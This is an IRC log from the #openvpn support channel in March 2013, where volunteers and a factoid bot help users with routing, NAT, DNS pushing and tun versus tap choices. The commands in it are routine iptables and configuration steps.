17:54 -!- catsup [~d@64.111.123.163] has joined #openvpn
17:59 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds]
18:00 -!- catsup [~d@64.111.123.163] has joined #openvpn
18:06 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds]
18:07 -!- catsup [~d@64.111.123.163] has joined #openvpn
18:12 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds]
18:13 -!- catsup [~d@64.111.123.163] has joined #openvpn
18:18 < eHAPPY> figured it out
18:19 < eHAPPY> it was a problem with vmware -_-
18:25 -!- mete [~mete@mete.shell.la] has quit [Quit: .]
18:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
18:29 -!- RichardBronosky_ [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has joined #openvpn
18:29 -!- Netsplit *.net <-> *.split quits: kyrix, Sickness\, Masxmasx, sejo, MeanderingCode, pulz, rob0, dropje, RichardBronosky, scoates
18:34 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 250 seconds]
18:39 -!- Netsplit over, joins: MeanderingCode, kyrix, pulz, dropje, Sickness\, rob0, sejo, scoates, Masxmasx
18:39 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Excess Flood]
18:39 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn
19:01 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds]
19:02 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn
19:18 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 250 seconds]
19:27 -!- levifig [~levifig@spwn.co] has quit [Excess Flood]
19:28 -!- levifig [~levifig@spwn.co] has joined #openvpn
19:28 -!- levifig [~levifig@spwn.co] has quit [Excess Flood]
19:29 -!- levifig [~levifig@spwn.co] has joined #openvpn
19:30 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 256 seconds]
19:35 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
19:36 -!- gardar [~gardar@gardar.net] has quit [Remote host closed the connection]
19:40 -!- gardar [~gardar@gardar.net] has joined #openvpn
19:45 -!- raidz is now known as raidz_away
19:52 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn
20:06 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds]
20:09 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
20:10 -!- vistas [~vistas@c-71-204-33-119.hsd1.ga.comcast.net] has joined #openvpn
20:15 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds]
20:16 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
20:51 -!- levifig [~levifig@spwn.co] has quit [Excess Flood]
20:53 -!- levifig [~levifig@spwn.co] has joined #openvpn
20:54 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Read error: Operation timed out]
20:59 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
21:00 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn
21:00 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host]
21:00 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn
21:00 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 276 seconds]
21:03 -!- CowboyPride [~chatzilla@unaffiliated/cowboypride] has joined #openvpn
21:03 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit []
21:03 < CowboyPride> I have a question. Under the best circumstances for hosting an OpenVPN Access Server behind a router, what is the recommended number of NIC interfaces?
21:05 < CowboyPride> Is there any benefit to having more than one physical interface for a server hosted behind a router on local network with port forwarding or DMZ router setup ?
21:06 -!- cafaroo [~gustaf@c213-89-175-69.bredband.comhem.se] has joined #openvpn
21:06 < pekster> !as
21:06 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
21:07 < pekster> We deal with the open-source OpenVPN project (the GPL project.) Access Server is commercial and unsupported in this channel
21:09 -!- zach__ [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has left #openvpn []
21:11 -!- cafaroo [~gustaf@c213-89-175-69.bredband.comhem.se] has quit [Ping timeout: 256 seconds]
21:13 < CowboyPride> Well the open source version is what I was looking at as well. It's a generic question to open vpn servers in general. Not limited toward the closed source or open source versions.
21:14 < pekster> Other than some use-case with HA or failover, multiple physical NICs don't really do you any good
21:15 < pekster> If you support multiple subnets, another NIC could help connect to different ports on a switch (of course you can use 802.1q to the same effect with a single NIC too)
21:16 < pekster> OpenVPN abstracts the network connection in the form of a virtual tun or tap tunnel to your peer. How you get the packets there across the "real" network infrastructure is no different than dealing with web, or IRC, or any other form of IP traffic
21:21 <+soapee01> CowboyPride: http://en.wikipedia.org/wiki/Link_aggregation
21:21 <@vpnHelper> Title: Link aggregation - Wikipedia, the free encyclopedia (at en.wikipedia.org)
21:26 < CowboyPride> Ok thanks.. I was looking into purchasing an Ultra Slim Desktop for my VPN server but didn't know if I should get one with dual nics or single nic
21:27 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza]
21:27 < pekster> Single-NIC is fine unless you have exotic needs like interface bonding, need to support a NIC failing on you, or something like that
21:28 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 260 seconds]
21:28 < CowboyPride> The only other reason I could think of having dual nics is if you were to host the VPN server on public internet if it had multiple ips.
21:28 < CowboyPride> which I'm guessing is a recommended setup when security is a concern.
21:29 < pekster> There again, it depends on implementation. I talked with a guy in another channel here that used a Ras Pi as his router by using VLAN tagging to a VLAN-aware switch, so there are always different solutions depending on your needs
21:31 < CowboyPride> I have been thinking about my setup and which way to go about it. I was thinking of either having my servers and my lan on the same subnet or separating my internal servers from my lan with a switch and then having the VPN server route traffic for them both for the local lan and remote vpn access.
21:31 < CowboyPride> The latter setup would be a good learning experience I think...
21:32 < CowboyPride> And would allow me to segregate my internal servers from my home lan
21:32 < CowboyPride> but I really don't know...
21:33 < CowboyPride> I am wanting to experiment with OpenVPN and also give myself remote access to my lan and internal servers as well as provide a site-to-site vpn to my parents' lan.
21:35 < CowboyPride> I could use LogMeIn vpn solution but I don't want to have to require my parents to leave their computer on all the time since they prefer to shut it off, but I could find other uses for the site-to-site vpn with a dedicated OpenVPN setup...
21:36 < CowboyPride> I've been thinking about it a lot but haven't settled on how I want to go about my setup.
21:37 < CowboyPride> LogMeIn Hamachi though isn't what I want though, I prefer OpenVPN I think over Hamachi
21:39 < pekster> You're not likely to get the advice you're hoping for on how to architect your network here. ##networking might be more appropriate, but this channel is designed to provide OpenVPN-specific information
21:40 < CowboyPride> ok, thanks.
21:55 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
22:19 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
22:26 <@EugeneKay> !fail2ban
22:27 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT
22:48 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has quit [Read error: Connection reset by peer]
22:51 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has joined #openvpn
23:30 < Dennis84> good morning
23:40 -!- Orbi [~opera@93.182.147.76] has joined #openvpn
23:41 -!- Orbi [~opera@93.182.147.76] has left #openvpn []
--- Day changed Fri Mar 08 2013
00:09 -!- daemoen [~daemoen@216.245.201.138] has quit [Ping timeout: 250 seconds]
00:22 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out]
00:25 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
00:41 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer]
00:43 < Dennis84> hi Wulf
00:43 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
00:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection]
00:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
01:05 -!- cafaroo [gustaf@c80-216-25-207.bredband.comhem.se] has joined #openvpn
01:07 -!- novaflash is now known as novaflash_away
01:26 -!- novaflash_away is now known as novaflash
01:53 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
02:07 -!- ade_b [~Ade@koln-5d81459c.pool.mediaWays.net] has joined #openvpn
02:07 -!- ade_b [~Ade@koln-5d81459c.pool.mediaWays.net] has quit [Changing host]
02:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:10 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
02:24 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"]
02:27 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
02:27 -!- dazo_afk is now known as dazo
02:37 -!- JackSparrow [~death@2001:41d0:1:d4e5:1234:1234:1234:1234] has quit [Ping timeout: 264 seconds]
02:38 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn
02:39 < Wulf> Dennis84: hi
02:40 < Wulf> Dennis84: looks like race conditions where timed events are involved. Will have another look at it on the weekend
02:41 -!- Mcloven__ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
02:43 -!- knobo [~user@ti0125a380-1018.bb.online.no] has quit [Disconnected by services]
02:52 < Dennis84> Wulf: ok great
02:53 < Dennis84> thanks a lot :)
03:00 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Read error: Connection reset by peer]
03:04 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
03:23 -!- zz_AsadH is now known as AsadH
03:27 -!- Webhostbudd_ [~Webhostbu@c-24-7-197-240.hsd1.il.comcast.net] has quit [Quit: Leaving]
03:30 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has quit [Ping timeout: 240 seconds]
03:33 -!- mete [~mete@mete.shell.la] has joined #openvpn
03:38 -!- dekroning [~dekroning@185.10.50.9] has joined #openvpn
03:39 < dekroning> how does openvpn redirect all traffic through the vpn? because I don't see my default route changed, when i'm connected as a client
03:43 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has joined #openvpn
03:44 < Wulf> dekroning: why do you think that it routes the traffic through your vpn?
03:53 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
03:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds]
03:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
03:56 -!- JSharpe [~JSharpe@46.165.221.13] has joined #openvpn
03:59 -!- newbie [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn
03:59 -!- newbie is now known as Guest48444
04:04 -!- dekroning [~dekroning@185.10.50.9] has quit [Ping timeout: 255 seconds]
04:05 -!- CowboyPride [~chatzilla@unaffiliated/cowboypride] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]]
04:06 -!- dekroning [~dekroning@vpn.cttinnovations.net] has joined #openvpn
04:12 -!- Guest48444 [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Quit: KVIrc 4.0.2 Insomnia http://www.kvirc.net/]
04:12 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn
04:31 -!- dekroning [~dekroning@vpn.cttinnovations.net] has quit [Read error: Connection reset by peer]
04:31 -!- dekroning [~dekroning@D57E6B92.static.ziggozakelijk.nl] has joined #openvpn
04:31 -!- kmmndr [~tomtom@bro67-2-82-227-110-8.fbx.proxad.net] has joined #openvpn
04:31 < kmmndr> hi all :-)
04:34 -!- dekroning [~dekroning@D57E6B92.static.ziggozakelijk.nl] has quit [Read error: Operation timed out]
04:34 < kmmndr> We are using openvpn on debian, that's almost perfect for our needs except one thing
04:34 < kmmndr> I haven't found any way to push DNS rule
04:34 < kmmndr> push "dhcp-option DNS .." doesn't seem to work
04:35 < kmmndr> has anyone ever experienced such problem ?
04:35 < MacGyver> Right, so, since my questions yesterday were unanswered:
04:35 < MacGyver> First, if I run OpenVPN on the client not in daemon mode, and drop privileges after startup, how can I ever get it to cleanly remove its routes when closing the tunnel using ctrl+C?
04:35 < MacGyver> Second, suppose I'm on a network whose DNS I want to continue to use, but *only* for the domain "localdomain", and for all others I want to use the pushed DNS. Furthermore, as soon as the VPN closes, the domain's DNS-server should be used again for all domains. Is there any easy way to do that, or am I going to have to use dnsmasq or similar solutions?
04:36 -!- dekroning [~dekroning@vpn.cttinnovations.net] has joined #openvpn
04:38 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
04:40 -!- dekroning [~dekroning@vpn.cttinnovations.net] has quit [Read error: Connection reset by peer]
04:41 -!- dekroning [~dekroning@vpn.cttinnovations.net] has joined #openvpn
05:09 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
05:13 -!- idlecool [~i@sd.gs] has left #openvpn ["Linkinus - http://linkinus.com"]
05:18 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds]
05:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds]
05:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
05:32 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn
05:34 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds]
05:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
05:38 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn
05:40 -!- abec0 [olivier@vvma.net] has joined #openvpn
05:41 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds]
05:44 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
05:44 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 276 seconds]
05:46 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn
05:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds]
05:55 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Quit: Computer has gone to sleep.]
05:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
06:22 < kisom> Morning
06:35 -!- dekronin1 [~dekroning@D57E6B92.static.ziggozakelijk.nl] has joined #openvpn
06:38 -!- dekroning [~dekroning@vpn.cttinnovations.net] has quit [Ping timeout: 245 seconds]
06:38 <@EugeneKay> MacGyver - magic, basically.
06:38 <@EugeneKay> !unpriv
06:38 <@vpnHelper> "unpriv" is see https://community.openvpn.net/openvpn/wiki/UnprivilegedUser for a write-up by EugeneKay on how to run OpenVPN without root/admin permissions.
06:39 <@EugeneKay> MacGyver - for the second question; no, you'll need to use something protocol-aware. My experience is that dnsmasq is a pile of turds; your mileage may vary.
06:40 -!- dekronin1 [~dekroning@D57E6B92.static.ziggozakelijk.nl] has quit [Ping timeout: 250 seconds]
06:40 -!- dekroning [~dekroning@vps3.cttinnovations.net] has joined #openvpn
06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
06:48 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:53 -!- dekronin1 [~dekroning@D57E6B92.static.ziggozakelijk.nl] has joined #openvpn
06:56 -!- dekroning [~dekroning@vps3.cttinnovations.net] has quit [Ping timeout: 248 seconds]
06:56 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn
06:58 -!- dekronin1 [~dekroning@D57E6B92.static.ziggozakelijk.nl] has quit [Read error: Connection reset by peer]
07:04 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 260 seconds]
07:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
07:06 < kmmndr> any idea for DNS push ?
07:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 07:07 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:21 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 276 seconds] 07:23 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 07:24 <@dazo> kmmndr: look at update-resolv scripts ... http://openvpn.git.sourceforge.net/git/gitweb.cgi?p=openvpn/openvpn-testing.git;a=tree;f=contrib/pull-resolv-conf/contrib/pull-resolv-conf;h=abb075de953ce2303bcf39ea8d265f008f152c91;hb=HEAD 07:24 <@vpnHelper> Title: SourceForge - openvpn/openvpn-testing.git/tree - contrib/pull-resolv-conf/contrib/pull-resolv-conf/ (at openvpn.git.sourceforge.net) 07:30 < kmmndr> dazo: thank you :- 07:30 < kmmndr> :-) 07:40 < kmmndr> dazo: that's a client side modification for linux 07:41 < kmmndr> but we also have windows clients 07:41 <@dazo> for windows you don't need that ... 
just push the DNS info, and the windows clients pick it up 07:42 < kmmndr> I'll try again on windows 07:42 < kmmndr> dazo: thanks :-) 07:50 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 07:57 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 07:59 -!- levifig [~levifig@spwn.co] has joined #openvpn 08:17 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 08:17 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 08:19 -!- levifig [~levifig@spwn.co] has joined #openvpn 08:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 08:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 08:37 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 08:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:04 -!- cafaroo [~gustaf@c80-216-25-207.bredband.comhem.se] has quit [] 09:11 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 09:27 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 09:27 -!- mode/#openvpn [+o krzee] by ChanServ 09:29 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:39 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:41 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:43 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:51 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Read error: Operation timed out] 10:17 -!- HyperGlide [~HyperGlid@182.149.50.45] has joined #openvpn 10:18 -!- n00 [~n00@130.225.74.204] has joined #openvpn 10:19 < n00> !welcome 10:19 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. 
|| See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 10:19 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:19 < n00> !route 10:19 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs behind 10:19 <@vpnHelper> the server or client 10:21 < n00> !serverlan 10:21 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 10:22 < n00> !goal 10:22 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:32 -!- JacquesBH [~jacques@unaffiliated/jacquesbh] has joined #openvpn 10:32 < JacquesBH> Hi all :) 10:33 < JacquesBH> Yeah, I love IRC, because when you need something... there's always a chan 10:33 < JacquesBH> Hum, I'm on Mac. (Mountain Lion) and I've a Debian server... 
I tried to configure the OpenVPN server but it doesn't work 10:34 < JacquesBH> (on client) 10:34 <@ecrist> you're the one that just posted on twitter 10:35 < JacquesBH> yes :) 10:35 <@ecrist> !logs 10:35 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 10:36 <@ecrist> !configs 10:36 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 10:36 < JacquesBH> ok right. I'll do it now. 10:40 < JacquesBH> ecrist: server config http://pastebin.com/9B89Rjtz OpenVPN 2.1.3 x86_64-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Feb 21 2012 10:41 <@ecrist> JacquesBH: OpenVPN 2.3.0 is latest. what you're using is really quite old 10:42 < JacquesBH> debian packages... 
10:42 < pekster> !repo 10:42 <@vpnHelper> "repo" is openvpn runs some software repositories for your installing pleasure, http://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 10:42 < JacquesBH> Ok I update my sources 10:42 < JacquesBH> then get back here with result :) thks 10:42 < pekster> That may not be the cause of your issue, but keep in mind that version is years out of date 10:42 < pekster> (in fact, unless you're trying to use a 2.2 or 2.3 centric feature, that's likely not the cause of your problem) 10:42 <@ecrist> no sense in starting your journey already out of date 10:43 < pekster> Yea 10:43 < pekster> Could be worse; I've seen 2.0.9 in here before :) 10:43 < pekster> Oh, and a case of 1.x too 10:43 <@ecrist> pekster: when I started this channel, that was current 10:43 <@ecrist> 2.0.9 was, not 1.x 10:44 < pekster> Yea, I remember the 2.0.9 days. And some build systems ~4 years back that had 2.0.9 as the most recent version it supported without sorcery and goats 10:44 < pekster> At the time they were "only" 2 years out of date 10:46 < JacquesBH> ecrist: ok, updated, OpenVPN 2.3.0 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [PKCS11] [eurephia] [MH] [IPv6] built on Mar 1 2013 10:46 < JacquesBH> I'll try again to connect.. 10:46 < JacquesBH> So the problem is... I can connect, but DNS doesn't seem to work 10:46 <@ecrist> right 10:47 <@ecrist> !configs 10:47 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 10:47 <@ecrist> need to see a client config as well as server 10:48 <@ecrist> JacquesBH: Are you configuring NAT on the server for VPN clients to get to the internet? 10:49 < JacquesBH> I just need a proxy... 
but Maybe later I'll use it for a network drive 10:49 <@ecrist> well, you're pushing redirect gateway, but not natting traffic for your users to get to the internet 10:49 < JacquesBH> ecrist: here the client http://pastebin.com/cKKSZ1Pr 10:49 <@ecrist> remove that line from your config, and things should "just work" 10:50 <@ecrist> you just want vpn clients to get to your 10.4.0.0/24 network, right? 10:50 < JacquesBH> hum... maybe :p I don't really know 10:50 <@ecrist> !goal 10:50 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:50 < JacquesBH> It's the first time I use openvpn :) 10:51 < JacquesBH> Ok, I need to access the internet over the VPN :) 10:51 < JacquesBH> for now it's the main goal 10:51 <@ecrist> ok, then you need to setup NAT 10:51 <@ecrist> this is a debian box? 10:51 < JacquesBH> yep 10:51 <@ecrist> I know nothing of debian, but this might work for you: 10:51 <@ecrist> !linnat 10:51 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 10:52 < JacquesBH> hum... Can I pastebin my firewall ? :) 10:52 <@ecrist> we don't actually do firewall support in here 10:54 < pekster> #netfilter is the right place to go for netfilter/iptables tasks 10:54 < JacquesBH> Yes I know, but the last lines are for openvpn... I'm not sure about those lines because I found lots of stuff... 
http://pastebin.com/2LkKfAsk 10:54 < pekster> They also have some very good tutorials/info links in the first /TOPIC URL 10:54 < JacquesBH> ok I go on 10:54 <@ecrist> if you follow the vpnHelper comment, you should be able to figure it out, though. 10:54 -!- raidz_away is now known as raidz 10:55 < JacquesBH> I'm reading and trying same time 10:57 < JacquesBH> ecrist: so actually my iptables are empty 10:57 < JacquesBH> http://pastebin.com/rdRWUNtf 10:58 <@ecrist> be back in about an hour 10:58 -!- AsadH is now known as zz_AsadH 10:59 < JacquesBH> ok well 11:01 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 248 seconds] 11:01 < n00> Hi guys, i'm trying to setup a "road-warrior"-setup, where the client is connected to the same subnet as our workstations(172.23.23/24). I'm running the OpenVPN server on a box with 2 NICs, the incoming connection is accepted on NIC1 (public ip), and i have bridged the second NIC eth1 with tap0 in br0. I can connect the client, and it is assigned an IP in the 172.23.23/24 subnet via openvpn 11:01 < n00> dhcp. From the client I can ping the br0 ip - but i can ping local workstations. Furthermore from the server "ping -i br0 workstationIP" works fine. Any ideas on where to begin troubleshooting? 11:01 < n00> *but i CANT ping local workstations 11:02 < pekster> Probably the firewall on the VPN server not allowing the VPN clients to ping 11:02 < pekster> Any reason to bridge? routing is generally more efficient and less complicated 11:02 < pekster> !tunortap 11:02 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. 
or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 11:03 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 11:03 < JacquesBH> guys ( ecrist ) it works :') 11:04 < JacquesBH> it seems that empty iptables is not good... I relaunch my firewall and it works... I'm so bad. 11:05 < n00> pekster: not having to setup WINS, which I believe is depreciated ? 11:05 < pekster> So you're using bridging so NBNS broadcasts "just work" instead of setting up a proper DNS infrastructure? 11:06 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:07 < pekster> You don't need WINS even on a Windows network with correctly configured/managed DNS 11:07 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:07 < Valcorb> rb 11:09 < n00> pekster: let's say I have a correct DNS setup, which mode (routed/bridged) should i use if I want users to access windows shares ? 11:10 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 11:15 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 11:16 -!- levifig [~levifig@spwn.co] has joined #openvpn 11:19 < n00> pekster: is it correctly understood that windows shares will work fine over routed 11:20 < pekster> Yup 11:21 < n00> pekster: and without WINS also? 11:21 < pekster> Although Windows does dumb things if you expect unqualified names to resolve. Solutions include hacking around the "undocumented features" of the so-called 'DNS Search Suffix List' or using FQDNs along with your DNS setup 11:21 < pekster> Yes 11:22 < pekster> I've personally set up remote-access VPNs for a Windows domain without WINS in a routed setup 11:22 < pekster> So it can surely be done 11:23 < n00> well that was nice to hear indeed! 
